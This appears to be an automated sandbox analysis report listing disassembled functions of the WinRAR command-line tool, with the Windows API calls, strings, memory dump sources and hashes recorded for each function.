Part of subcall function 00007FF695D14AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF695CECC90), ref: 00007FF695D14AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1492E
GetVersionExW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF695D07E7D), ref: 00007FF695D14993
LoadLibraryW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1499F

Strings

rarlng.dll, xrefs: 00007FF695D1493A

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: d0c3cd362ea0f65bbec59b8c8e10c821b133fb01fb46b1a5a243623ffd72981c
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: 32316131619A42C5FB749F21E8402E933E0FB45B84F8062B5EA8D87694DF3CD94ECB44

Function 00007FF695CF46EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF4736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF47A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF695CF4620,?,00000000,?,00007FF695D17A8C), ref: 00007FF695CF47B2

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: 211c156fa662e028f481b3b29ff2b7922c5368bdfa2f817de7d0c2e45d9ca3d3
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: B641A43260868196EA349B25E4802E863E0FB49BB4F405375EE7D877C5DF6CD959C700

Function 00007FF695CE901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF695CE904D
CryptGenRandom.ADVAPI32 ref: 00007FF695CE9061
CryptReleaseContext.ADVAPI32 ref: 00007FF695CE9074

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: 52c25486b0fb47f605e6dab271c4b979dce5dbfed34f6346f12b90d1d830f5bf
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: 1401AD26B0864082E7209B12A84533D67A1EBC4FD0F088475DE4D87BA8CF7CDD8AC740

Function 00007FF695CDB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF695CDB900

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
Instruction ID: 3a79116998ecd8d64488a62f24b54dfd4fa812499a79e373d3b3926ed4e69198
Opcode Fuzzy Hash: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
Instruction Fuzzy Hash: 2E227232A086829AE724DF30D4402FE77F0FB50B48F584176DA8DDA699DE78ED46CB50

Function 00007FF695CFAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF695CFB0C7

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ab94304cbc9b67c99a8dfe8e518d31b2affcaf6fc96be297faa8bc65dcb09ce
Instruction ID: 5c07dff22dd6498c2cb945f9c954cf526e06eb3ba12dfa9e8ad39a38b7b6eb17
Opcode Fuzzy Hash: 9ab94304cbc9b67c99a8dfe8e518d31b2affcaf6fc96be297faa8bc65dcb09ce
Instruction Fuzzy Hash: 0E71C032A0568586D714DF29E8052ED33E1FB88F98F044239DF5DCB399DF78A8528794

Function 00007FF695D13EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF695D13EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF695D13E8F,?,00007FF695D07E90), ref: 00007FF695D13F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695D143C6

Strings

MENU, xrefs: 00007FF695D14235
,, xrefs: 00007FF695D143FB
@%s:, xrefs: 00007FF695D143A5
RTL, xrefs: 00007FF695D1437A
STRINGS, xrefs: 00007FF695D14219
*messages***, xrefs: 00007FF695D14050
DIALOG, xrefs: 00007FF695D14227
DIRECTION, xrefs: 00007FF695D14243
\, xrefs: 00007FF695D14519
$%s:, xrefs: 00007FF695D1439E
*messages***, xrefs: 00007FF695D14080

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
Instruction ID: 1562b311c95fec68519ed0abc17b000fafb0667cf968847a444a74257679be2b
Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
Instruction Fuzzy Hash: B222E222A1968285EB34DB15D4402F923E1FF45B84F806275EA4EC7AD9EF7CED49C348

Function 00007FF695CE4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF695CE5043
wcschr.LIBVCRUNTIME ref: 00007FF695CE5129

Strings

.rar, xrefs: 00007FF695CE50E6
stdin, xrefs: 00007FF695CE52C2
.rar, xrefs: 00007FF695CE508E
.part, xrefs: 00007FF695CE50A5
AFUMD, xrefs: 00007FF695CE5122
FUADPXETK, xrefs: 00007FF695CE503C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: c64bd03e62480eeaee42b805859bd7f98b599e071dc755959bceef3ef4306010
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: A7C1A763A1C682D4EA35AF2499521FC13E1EF46F84F4451B9DA4ECA6DADE2CFD09C300

Function 00007FF695D17F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF695D1805C

Part of subcall function 00007FF695D1B3F0: GetSystemDirectoryW.KERNEL32(00000000,00007FF695D17F72), ref: 00007FF695D1B41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF695D17F88
GetProcAddress.KERNEL32 ref: 00007FF695D17FA3

Strings

CryptProtectMemory, xrefs: 00007FF695D17F7E
CryptUnprotectMemory failed, xrefs: 00007FF695D18053
CryptProtectMemory failed, xrefs: 00007FF695D18009
Crypt32.dll, xrefs: 00007FF695D17F66
CryptUnprotectMemory, xrefs: 00007FF695D17F95

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: c56d37c46c8cb902bd84ff1542e4dc6049cdaa78d138650199d7af5331e1c856
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: 11414C21A08A8681FA69DB52A80157567E1FF45FD4F0823B5CD5E877A4DE7CEC4A8308

Function 00007FF695D2B0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF695D2B110

Part of subcall function 00007FF695D2AA8C: __isa_available_init.LIBCMT ref: 00007FF695D2AAA9
Part of subcall function 00007FF695D2AA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF695D2AAAE

__scrt_fastfail.LIBCMT ref: 00007FF695D2B11E

Part of subcall function 00007FF695D2B52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF695D2B548
Part of subcall function 00007FF695D2B52C: RtlCaptureContext.KERNEL32 ref: 00007FF695D2B571
Part of subcall function 00007FF695D2B52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF695D2B58B
Part of subcall function 00007FF695D2B52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF695D2B5CC
Part of subcall function 00007FF695D2B52C: IsDebuggerPresent.KERNEL32 ref: 00007FF695D2B620
Part of subcall function 00007FF695D2B52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF695D2B641
Part of subcall function 00007FF695D2B52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF695D2B64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF695D2B12C
__scrt_fastfail.LIBCMT ref: 00007FF695D2B143
__scrt_release_startup_lock.LIBCMT ref: 00007FF695D2B1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF695D2B1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF695D2B1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF695D2B21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF695D2B239

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: 80a26a7e12cc6d7edcb3669c2ffd2fbc1025f3abe33b11e9c03808103ef4d8c5
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: DB314E21E0D28381FA34AB25A5153B913D1EF45F84F4472B4DA4DCB6D7DEACEC0E8648

Function 00007FF695D14774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D147DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D14831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D14853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF695D1495D,?,?,?,00007FF695D07E7D), ref: 00007FF695D148A6

Strings

Software\WinRAR\General, xrefs: 00007FF695D147CD
LanguageFolder, xrefs: 00007FF695D14806

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: 3bac9cceaa7e33697a308fb5dff5aa529df8811d7adbf5e90f79641f2e99ecc9
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: AA319222718A8181EB709F21E8102BE6391FF85B94F406371EE4D8BBD9EF6CD949C744

Function 00007FF695D04398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D043D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D04402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D0440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D0443E

Strings

AppData, xrefs: 00007FF695D043F7
Software\WinRAR\Paths, xrefs: 00007FF695D043BC

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: f2d3368c863fe3d247c4d78898010ecf852403ae42af3734daa825af8662ddfc
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: EE116022A1874285EA709F25A4005B973A0FF84FC4F446276EE4E87699EF7DD848C748

Function 00007FF695CD7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF695CD7BF3

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
